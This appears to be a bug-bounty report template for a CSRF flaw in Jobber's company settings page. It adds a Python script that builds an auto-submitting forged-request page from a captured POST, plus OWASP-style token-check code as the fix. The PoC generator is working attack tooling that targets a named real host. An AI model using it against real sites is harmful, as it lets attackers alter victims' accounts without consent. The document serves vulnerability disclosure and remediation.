Name: John Doe
Email Address: [email protected]

Affected URL/Area: clienthub.getjobber.com/vulnerablepage

Description of bug in detail

Description of what the bug is and why it’s a bug.

Justification for Initial Severity Assessment

Example: this is critical because a remote shell can be executed on the server. Tie the rating to the actual impact of the bug described above (a CSRF that changes company settings is rated on what that change lets an attacker do).

Steps to reproduce the issue

  1. Log in to your account.
  2. Click Settings, then Company Settings.
  3. Change the company name or phone number and submit the form.
  4. Capture the request in Burp Suite (see screenshot below).
  5. Right-click the intercepted request and choose Engagement tools > Generate CSRF PoC.
  6. Copy the generated code into an HTML file, e.g. exploit.html.
  7. While still logged in, open exploit.html in the browser and confirm that the company settings change even though no anti-CSRF token was supplied.

Proof-of-concept

<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite -->
  <body>
    [paste the rest of the generated page here: the form with its hidden inputs and the auto-submit script]
  </body>
</html>
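What Burp's "Generate CSRF PoC" step produces is an HTML page that re-sends the captured form from a page the attacker controls. The following is an added example, not Burp's generator and not part of the report template: it parses a constructed form-encoded POST and emits the same kind of auto-submitting page. The endpoint path /company/settings, the field names and the cookie value are assumptions made up for the example, not Jobber's real request.

```python
"""Build an auto-submitting CSRF PoC page from a captured POST request.

Added example modelled on Burp's CSRF PoC generator. Everything in
CAPTURED_REQUEST is constructed; the path and parameter names are assumed.
"""
from html import escape
from urllib.parse import parse_qsl

# Constructed sample of a captured request (assumed endpoint and fields).
CAPTURED_REQUEST = (
    "POST /company/settings HTTP/1.1\r\n"
    "Host: clienthub.getjobber.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: session=redacted\r\n"
    "\r\n"
    "company_name=Evil+Corp&phone=%2B1-555-0100"
)


def parse_request(raw):
    """Split a raw HTTP request into (method, absolute URL, form fields)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    ctype = headers.get("content-type", "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        raise ValueError("only form-encoded bodies are handled here")
    url = "https://" + headers["host"] + path
    # Decode the body into (name, value) pairs; blanks are kept so the
    # replayed form matches the original field for field.
    fields = parse_qsl(body, keep_blank_values=True)
    return method, url, fields


def generate_csrf_poc(raw):
    """Return an HTML page that re-submits the captured form cross-site.

    The victim's browser attaches its own session cookie to the form post;
    the page only works if the server accepts the request without a token.
    """
    method, url, fields = parse_request(raw)
    inputs = "\n".join(
        '      <input type="hidden" name="%s" value="%s" />'
        % (escape(n, quote=True), escape(v, quote=True))
        for n, v in fields
    )
    return (
        "<!DOCTYPE html>\n"
        "<html>\n"
        "  <!-- CSRF PoC - added example, modelled on Burp's generator -->\n"
        "  <body>\n"
        '    <form action="%s" method="%s">\n'
        "%s\n"
        '      <input type="submit" value="Submit request" />\n'
        "    </form>\n"
        "    <script>document.forms[0].submit();</script>\n"
        "  </body>\n"
        "</html>\n"
    ) % (escape(url, quote=True), method, inputs)


if __name__ == "__main__":
    print(generate_csrf_poc(CAPTURED_REQUEST))
```

Save the printed page as exploit.html and open it in the browser that holds the victim session (step 7). If the session cookie is marked SameSite=Lax or Strict, the browser will not attach it to this top-level cross-site POST and the PoC fails on its own; that is the first thing to check before concluding the endpoint is protected.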

Expected results that show bug

Successfully exploiting the bug will result in [description of what is to be expected]

Evidence to support proof-of-concept

Any images or recorded video that show successful exploitation.

Tools used

Recommendations for fixing and/or mitigation

According to OWASP, the recommendations for fixing are:
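The OWASP CSRF Prevention Cheat Sheet's primary recommendation is a synchronizer token: a secret bound to the session, embedded in the legitimate form and verified on every state-changing request, with a SameSite cookie attribute as defence in depth. The following is an added example of that check, not Jobber's code; the in-memory session store, the handler signature and the cookie name are assumptions made for the example.

```python
"""Synchronizer token check for a settings-update handler.

Added example of the OWASP synchronizer token pattern. SESSIONS,
update_company_settings() and the cookie name are assumptions, not
the application's real code.
"""
import hmac
import secrets

SESSIONS = {}  # constructed in-memory session store: session id -> dict


def new_session():
    """Create a logged-in session with its own unpredictable CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {
        "csrf_token": secrets.token_urlsafe(32),
        "company_name": "Acme",
    }
    return sid


def session_cookie_header(sid):
    """Set-Cookie value: SameSite=Lax keeps the cookie off cross-site POSTs."""
    return "session=%s; HttpOnly; Secure; SameSite=Lax" % sid


def render_settings_form(sid):
    """The legitimate form carries the session's token as a hidden field."""
    token = SESSIONS[sid]["csrf_token"]
    return '<input type="hidden" name="csrf_token" value="%s" />' % token


def csrf_ok(sid, form):
    """Constant-time comparison of the submitted token against the session's.

    An attacker's page cannot read the victim's token (same-origin policy),
    so a forged submission arrives without it or with a wrong value.
    """
    expected = SESSIONS.get(sid, {}).get("csrf_token")
    submitted = form.get("csrf_token", "")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def update_company_settings(sid, form):
    """Handler for the state-changing POST; returns (status, message)."""
    if sid not in SESSIONS:
        return 401, "not logged in"
    if not csrf_ok(sid, form):
        return 403, "CSRF token missing or invalid"
    SESSIONS[sid]["company_name"] = form["company_name"]
    return 200, "updated"


def demo():
    """Forged request (cookie only) is rejected; genuine one succeeds."""
    sid = new_session()
    # Submission from exploit.html: the browser adds the cookie, but the
    # attacker never learns the token, so the form lacks it.
    forged = {"company_name": "Evil Corp"}
    forged_status, _ = update_company_settings(sid, forged)
    # Genuine submission from the server-rendered form, token included.
    token = SESSIONS[sid]["csrf_token"]
    genuine = {"company_name": "Acme Ltd", "csrf_token": token}
    genuine_status, _ = update_company_settings(sid, genuine)
    return forged_status, genuine_status, SESSIONS[sid]["company_name"]


if __name__ == "__main__":
    print(demo())
```

The token check must run on the server for every request that changes state, not only on the settings form; SameSite=Lax alone is not sufficient, since it does not protect against same-site subdomains or browsers that do not enforce it.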